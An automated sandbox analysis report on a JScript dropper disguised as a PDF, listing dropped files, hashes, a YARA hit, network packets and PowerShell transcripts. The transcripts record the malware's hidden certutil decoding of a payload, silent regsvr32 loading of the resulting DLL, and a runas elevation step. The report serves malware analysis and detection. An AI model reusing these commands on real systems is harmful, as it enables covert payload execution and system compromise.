              SHA-256:3388BDB71AE2B8E7CDA2531053153DCDDF9BDA4F918BFEDCDF6159AD76B41F7C
              SHA-512:5895B3B89F77502D555A96CF95C74FF798404211CAD3B589D13C5C8F81498F35F42CAEADD6059619A6156090E28C29F3650778D4EBDDFD8489991D93D6E1F069
              Malicious:false
              Preview: 2021/08/25-10:58:58.661 6196 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/08/25-10:58:58.666 6196 Recovering log #3.2021/08/25-10:58:58.666 6196 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              File Type:data
              Category:dropped
              Size (bytes):786432
              Entropy (8bit):0.008087951114387475
              Encrypted:false
              SSDEEP:6:IiVzAKGzMiVzAKGzMiV+NenXczMiVxAi8bEnXczMiVxAi8bEnXczMiVxAi8bEnXO:I+Xd+XdlNe/0H8o/0H8o/0H8o
              MD5:53F5DC703BE9FCD61996101E2F6A9E76
              SHA1:0ECA6055C45CD86972B93DE98DE5B54A751DFA09
              SHA-256:657EDE3960A4E54B749BED21A8778A7A77E5011C346F5E053E0879ABDA6BB106
              SHA-512:55B1DAB7367BA60C3746F254FF028CDA7DDCDF16CF1F34DD5AA02EEE8C5C515B08C7663C0EAD133241B27FBE126B99B2F518AA1C30E16C17E0AF8F191CD8E522
              Malicious:false
              Preview: VLnk.....?......B....Y..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-210825102641Z-456.bmp
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32
              Category:dropped
              Size (bytes):65110
              Entropy (8bit):4.2198560366804525
              Encrypted:false
              SSDEEP:768:Wng8qAfr6ROonKau62uylygjJZaw8RIqHU9mm3jUcE7OmoaVRT5GmvteUr:Wg8df2Xx6oELCIqEmmRE7OmxVR9pr
              MD5:D2734655730CEE7E0C558FA03442DAF8
              SHA1:D109528D6F7A14AB32EF62909175CB8CB40BE65E
              SHA-256:60B58A8DF17BF8CEBDD05904EB3BA3F9C96259FB0914EF93CBFCFDC4D23324CD
              SHA-512:332517D1D16CBC6C9B026C810FFCEC3900B982ABEA5B289F7772F2421AC45216FBED3A096CABA76B89F4A3E0FA971BCCE413311278CDAE36D8E1552AB057EC85
              Malicious:false
              Preview: BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              File Type:SQLite 3.x database, last written using SQLite version 3024000
              Category:dropped
              Size (bytes):32768
              Entropy (8bit):3.4454841474159394
              Encrypted:false
              SSDEEP:96:k49IVXEBodRBkWCIPbir7hxzCK449IVXEBodRBkWCIP6r7hxzCKI49IVXEBodRBK:HedRByedRBGedRBOedRBc
              MD5:86EB5BB2D1F9F3A785A7047EDA61D99C
              SHA1:FB8C576B19FEFCAB03E2796CDEA7EEBC949BDEEC
              SHA-256:DBD42C5753470A481145B064BF8E1A37599697EA0E8AEFE0ED3C25EDB958096D
              SHA-512:CA5715BD176FDE4169CC1D622DC036EB453577748ECB514846C1F2AC84331BA7ACB37EEB5BE4284CEDF19F75C6D496E4C71444DE609851D40AC24D31FDC0B34E
              Malicious:false
              Preview: SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              File Type:data
              Category:modified
              Size (bytes):34928
              Entropy (8bit):3.3113398978719064
              Encrypted:false
              SSDEEP:96:sCIPbir7hx/CPK949IVXEBodRBkICIPbir7hxzCKvt49IVXEBodRBkBCIP6r7hx8:diedRBQSedRBKCedRBhyedRB9
              MD5:8FA8AE01D833A5E8A8ED3C54E313ADC1
              SHA1:9548661072DB916242BF0CB6F4CD2B925F856D00
              SHA-256:5886D7AB07233C84056515B7368ED9BBB10A4D0368AD8D8F13303F8B9F71DC0F
              SHA-512:3FD999224C4DFE142E41467E79A53AE9451045486152DCDB3E7A040E876B1C1C5FEEED6EF21764FCB68EC705695820EDB15069D362EACCB50E25785319C077F6
              Malicious:false
              Preview: ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.5476
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):99226
              Entropy (8bit):5.20123718295693
              Encrypted:false
              SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z7ADWp1ttawvayjLp:RNj/aRlQShhp2VpMKRhWa11quVJG
              MD5:0CC5B651083D472BBBEA6912DDE3213E
              SHA1:4699D6270B6D68238852383C42A32E7FD1AD2D07
              SHA-256:5169784356F69B13E8A6A1726893AF02FDE7D786A343923E40C6762D0123FAA6
              SHA-512:3E790C90794609A928FDA4892E2CB57609FFF7BB0D8765763D8BBAC2B586083BBEE09B638595E0C5CB5481649F6DE045AF9ECD063BB8D55C96BBEE948948550C
              Malicious:false
              Preview: %!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):99226
              Entropy (8bit):5.20123718295693
              Encrypted:false
              SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z7ADWp1ttawvayjLp:RNj/aRlQShhp2VpMKRhWa11quVJG
              MD5:0CC5B651083D472BBBEA6912DDE3213E
              SHA1:4699D6270B6D68238852383C42A32E7FD1AD2D07
              SHA-256:5169784356F69B13E8A6A1726893AF02FDE7D786A343923E40C6762D0123FAA6
              SHA-512:3E790C90794609A928FDA4892E2CB57609FFF7BB0D8765763D8BBAC2B586083BBEE09B638595E0C5CB5481649F6DE045AF9ECD063BB8D55C96BBEE948948550C
              Malicious:false
              Preview: %!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):42051
              Entropy (8bit):5.06012521068305
              Encrypted:false
              SSDEEP:768:FJe3V3IpNBQkj2MPfoJUpSHWrxhNefEYhSH3Nh4iUxifrRJPFBtAHk4a5V4WeXCB:Le3V3CNBQkj26CUp2WrxhNefEYhuh4iH
              MD5:BC8D1E99148F6A7FDE691CD5BC4B278D
              SHA1:83AA648C863CA9E2118480FBCFD6A9E704BD26B8
              SHA-256:5D4BF744ED0D45C44AF33B3EB894A320F195A10412255B679EDFF497B7A48EA7
              SHA-512:2C975A2D7B0A95A66CDF91E9B938B8B43EAE27AAD0F33A456A9B1C9DE9B3D0965678AA486346608B8671DF7FDA1AC354D18B3DA886FF2012CDB85259BF5A6398
              Malicious:false
              Preview: PSMODULECACHE.>..........?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet........r.(.....E...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1........Get-NetNat........Add-NetNatExternalAddress........Get-NetNatExternalAddress........Set-NetNatGlobal........New-NetNat........Set-NetNat........Get-NetNatStaticMapping........Remove-NetNatExternalAddress........Get-NetNatSession........Add-NetNatStaticMapping........Get-NetNatGlobal........Remove-NetNatStaticMapping........Remove-NetNat.........h6.....O...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1U.......Set-NetIPsecMainModeRule........Find-NetIPsecRule........Copy-NetIPsecRule........Rename-NetIPsecMainModeRule....!...Remove-NetIPsecQuickModeCryptoSet........New-NetFirewallRule........Rename-NetIPsecPhase1AuthSet........Get-NetIPsecQuickModeSA........Get-NetFirewallSetting........Show-NetIPsecR
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):0.34726597513537405
              Encrypted:false
              SSDEEP:3:Nlll:Nll
              MD5:446DD1CF97EABA21CF14D03AEBC79F27
              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
              Malicious:false
              Preview: @...e...........................................................
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tlnndwi.mse.psm1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.566978116135921
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdc:SnqbKAKWG49Qdc
              MD5:0AC9C7286235950F220CBE970D3084FC
              SHA1:8C250343541F910315949B02672CF17293CA52F1
              SHA-256:30D1E4254E4D9A4A5081616761DD00F0DE0B96AEBDFBA0B4B241FC9EADF5EECA
              SHA-512:4542790A00FA3C99BE28C395A292F401E5A4E201ECF43249FE33A9B34E9CFF604CACC626F35BC2481332FC1FCD34A2699023C31A8A1BA9C2B9C30DC27B4B4714
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:27 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_314synge.kay.ps1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.566978116135921
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdc:SnqbKAKWG49Qdc
              MD5:0AC9C7286235950F220CBE970D3084FC
              SHA1:8C250343541F910315949B02672CF17293CA52F1
              SHA-256:30D1E4254E4D9A4A5081616761DD00F0DE0B96AEBDFBA0B4B241FC9EADF5EECA
              SHA-512:4542790A00FA3C99BE28C395A292F401E5A4E201ECF43249FE33A9B34E9CFF604CACC626F35BC2481332FC1FCD34A2699023C31A8A1BA9C2B9C30DC27B4B4714
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:27 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2myfuxn.df3.psm1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.597721634601021
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfUjko:SnqbKAKWG49QPko
              MD5:4B0B19ED1A16A24E390FDB0DBD07C969
              SHA1:9BC5EEC4D6C37EE4DBCE56422E3810E0204AA485
              SHA-256:C635D8D501C52A77903D752570A6C7F3B28EBFDE8B1B6F7FB30ACFFCF06E2298
              SHA-512:F2C040B6F5CFC1993B6CA5B5BDB75BDED1290F2AD9608B8460709DA396941F03432E06E5D02606F3FD32A7BF88E74153159AD44E97C66E3729FA65DE317B7FE5
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:14 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpukosai.css.psm1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.597721634601021
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfVYo:SnqbKAKWG49QaF
              MD5:79517927D5DC678F0983E0BF9141B096
              SHA1:9A94D52934B8085223B39284E824A320D328198D
              SHA-256:5A3CB2130D2993959F80CAE5BC2DF26A338A71EDF9278829D293386D77F627E0
              SHA-512:6D01CD98AE9FB4BDCB58AC3910734525D25168180F76AF2CE59F230DEEFDAED760DAA2C07C576425B17A09E831C7411D04F1B8B743D13C10C18FF775778176DC
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:04 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzw2oefn.flp.psm1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.607041233393162
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdzo:SnqbKAKWG49Qdzo
              MD5:F81E09C73E361EF54C76DE36CC7443D0
              SHA1:6372C00FEE0E6EB4DBDEF267A50DB7480C05BF97
              SHA-256:57D237A370C67052E91756DA3A3C8EB0E5A9A08F84CE6A54FE502D9EB6143C85
              SHA-512:C1FA81083D792E6A673695A4FB0155C7C8D4C3B0ECB0C09B25733214360194DA550156A934DB1DE36214CC145F9C812B41CC77A679460C6B9E8DF2BF87B2540E
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:49 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5k2uwgu.rhk.ps1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.607041233393162
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQdzo:SnqbKAKWG49Qdzo
              MD5:F81E09C73E361EF54C76DE36CC7443D0
              SHA1:6372C00FEE0E6EB4DBDEF267A50DB7480C05BF97
              SHA-256:57D237A370C67052E91756DA3A3C8EB0E5A9A08F84CE6A54FE502D9EB6143C85
              SHA-512:C1FA81083D792E6A673695A4FB0155C7C8D4C3B0ECB0C09B25733214360194DA550156A934DB1DE36214CC145F9C812B41CC77A679460C6B9E8DF2BF87B2540E
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:58:49 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwvpeds3.jyy.ps1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.597721634601021
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfVYo:SnqbKAKWG49QaF
              MD5:79517927D5DC678F0983E0BF9141B096
              SHA1:9A94D52934B8085223B39284E824A320D328198D
              SHA-256:5A3CB2130D2993959F80CAE5BC2DF26A338A71EDF9278829D293386D77F627E0
              SHA-512:6D01CD98AE9FB4BDCB58AC3910734525D25168180F76AF2CE59F230DEEFDAED760DAA2C07C576425B17A09E831C7411D04F1B8B743D13C10C18FF775778176DC
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:04 AM
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjlixia1.oiz.ps1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.597721634601021
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFiM9cMfQcfUjko:SnqbKAKWG49QPko
              MD5:4B0B19ED1A16A24E390FDB0DBD07C969
              SHA1:9BC5EEC4D6C37EE4DBCE56422E3810E0204AA485
              SHA-256:C635D8D501C52A77903D752570A6C7F3B28EBFDE8B1B6F7FB30ACFFCF06E2298
              SHA-512:F2C040B6F5CFC1993B6CA5B5BDB75BDED1290F2AD9608B8460709DA396941F03432E06E5D02606F3FD32A7BF88E74153159AD44E97C66E3729FA65DE317B7FE5
              Malicious:false
              Preview: # PowerShell test file to determine AppLocker lockdown mode 8/25/2021 10:59:14 AM
              C:\Users\user\Documents\20210825\PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):1090
              Entropy (8bit):5.147237381250279
              Encrypted:false
              SSDEEP:24:BxSAjTp3RCvi3OQx2DOXisXA3bEMWz0jeuKK6X4CIym1ZJXLVA3bEunxSAZQ:BZlRCvqOQoOCbWzCKYB1ZgbBZZQ
              MD5:0B7BBD141D7FB4542A1374C43369F80C
              SHA1:02C808E1E32696033002289F2AAA5D849C940437
              SHA-256:17FA171B58D2ABBB8C979F79E87D6D28AA938E7030D047DC2C6273F9A44874EC
              SHA-512:70A1EC6A5C0C2F84F3DAD0E2A179D84047AE1504F0F787BCB7B6FC7A97EE5598CF9F460C4326BA5536F7F636A094AC04A73E60C8B79FCDAC465159FF3B4E1245
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210825105914..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..Process ID: 2324..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210825105914..**********************..PS>start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..**********************..Command start time: 20210825110212..**********************..PS>$global:?..True..*******************
              C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):1218
              Entropy (8bit):5.24508468582021
              Encrypted:false
              SSDEEP:24:BxSAF3RCvi3OQx2DOXUWeWH0jeuKK6X4CIym1ZJXANZnxSAZx:BZBRCvqOQoOpHCKYB1ZOZZx
              MD5:1FC1A6A9D49B7BE9CD7323F6B46A5C4A
              SHA1:C56FC949EDBA224809EB44C8492FF3191F71CC68
              SHA-256:427DF863E391AC0A99BA6E457089B03CFE31DAB2DAA506063E4952136C8EAD0B
              SHA-512:AE8D7A1AB33A7B9E5E21A9BFFF6E6DB5C3A95E3AEAAB8127699FD5DD5AEFCE7A6A89EB7EEFB5058DB72A8568F7468F1E0E49F4F14061E0CB1751DB46570A3CCD
              Malicious:false
              Yara Hits:
              • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt, Author: Florian Roth
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210825105828..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Process ID: 304..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210825105828..**********************..PS>certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Input Length = 259416..Output Length = 194560..CertUtil: -decode command completed successful
              C:\Users\user\Documents\20210825\PowerShell_transcript.910646.nPCQMNnw.20210825105903.txt
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):1090
              Entropy (8bit):5.152263139561
              Encrypted:false
              SSDEEP:24:BxSAsp3RCvi3OQx2DOXisXA3bEMWo0jeuKK6X4CIym1ZJX+A3bEPnxSAZJ:BZ0RCvqOQoOCbWoCKYB1ZTbaZZJ
              MD5:D12099E71CEBA18F2E7CCB23BC2B62FB
              SHA1:B91B290B2A6842FC9F2280D8E6D4331593B12940
              SHA-256:DA9FDDCD0B5DD7AECCFE212F95F263F7B12861372AB7988DEC2B1916FA4E5344
              SHA-512:0817FFAC3452690297879781DE0DA17249CAB41EDF8ABBF9A6FAEC61BA5A5D30DB991983338AB2B103A79DAB473170B2146745C27581F6E4F4DD6C84E8FA50CE
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210825105904..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..Process ID: 5740..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210825105904..**********************..PS>start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..**********************..Command start time: 20210825110253..**********************..PS>$global:?..True..*******************
              C:\Users\user\Documents\20210825\PowerShell_transcript.910646.sSdEtW4E.20210825105848.txt
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):1041
              Entropy (8bit):5.1610752774522135
              Encrypted:false
              SSDEEP:24:BxSAA3RCvi3OQx2DOXUW8PlGWL0jeuKK6X4CIym1ZJXN41Pl2nxSAZO:BZsRCvqOQoOWLLCKYB1Z/aiZZO
              MD5:A878C4C68743CAC65674BFA242FA0CC1
              SHA1:47615AC7B86E080EF15F9E5161E6247CEB3CEB27
              SHA-256:81DE67A2762EE90A43A819AA7E200E4187DDD8BD0C57A876B3B5AFF570B24F4F
              SHA-512:50441547206B87F15BF42729F00556CF4E2483559D3B05A201B6D1B1E333A45640161A9A14254B8D37795E180B89DF00252F1BD229111A3B804D34B78AA68256
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210825105849..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a..Process ID: 4168..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210825105849..**********************..PS>regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a..**********************..Command start time: 20210825105850..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time:

              Static File Info

              General

              File type:ASCII text, with very long lines, with no line terminators
              Entropy (8bit):5.984829221055381
              TrID:
                File name:x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
                File size:28634023
                MD5:8b274243a5179028388a2c17c75afb9f
                SHA1:d5c09a6fff4dee7dee7f302c1d4d586ba6bc83f2
                SHA256:20eff877aeff0afaa8a5d29fe272bdd61e49779b9e308c4a202ad868a901a5cd
                SHA512:6848fe1763e2ec535b05374687cce02eeca59de0de21cbf1501defbb100ebe2bfaca68f6f75f4d34b8dbf1cda776b077096f550ca85a97586e311ab66e56e2af
                SSDEEP:49152:i0ivhMr3KWDux3B2PfsN7B0eP3GBxGwJzMvY+DHEAh7BeE3bt3FK6/Zas9gthH/t:X
                File Content Preview:try { d6rdVIu1CNC = "JVBERi0xLjQKJcO+CjEgMCBvYmo8PC9QYWdlcyA4NSAwIFIgL091dGxpbmVzIDE3IDAgUiAvVHlwZSAvQ2F0YWxvZz4+CmVuZG9iagoyIDAgb2JqCjw8L1R5cGUvRm9udCAvU3VidHlwZS9UeXBlMCAvQmFzZUZvbnQvtbi/8sO8LEJvbGQgL0VuY29kaW5nIC9LU0MtRVVDLUggL0Rlc2NlbmRhbnRGb250c1szID

                File Icon

                Icon Hash:e8d69ece968a9ec4

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 25, 2021 10:59:24.995543003 CEST4970180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:24.995582104 CEST4970080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:25.485392094 CEST804970050.17.5.224192.168.1.103
                Aug 25, 2021 10:59:25.485420942 CEST804970150.17.5.224192.168.1.103
                Aug 25, 2021 10:59:25.485584974 CEST4970080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:25.485640049 CEST4970180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:25.488600016 CEST4970080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:25.488651991 CEST4970180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:26.413067102 CEST4970180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:26.489414930 CEST804970050.17.5.224192.168.1.103
                Aug 25, 2021 10:59:26.489447117 CEST804970150.17.5.224192.168.1.103
                Aug 25, 2021 10:59:27.508347034 CEST804970150.17.5.224192.168.1.103
                Aug 25, 2021 10:59:29.520359039 CEST4970180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:29.520620108 CEST4970080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:29.523055077 CEST4970480192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:29.528902054 CEST4970580192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:30.565032959 CEST804970450.17.5.224192.168.1.103
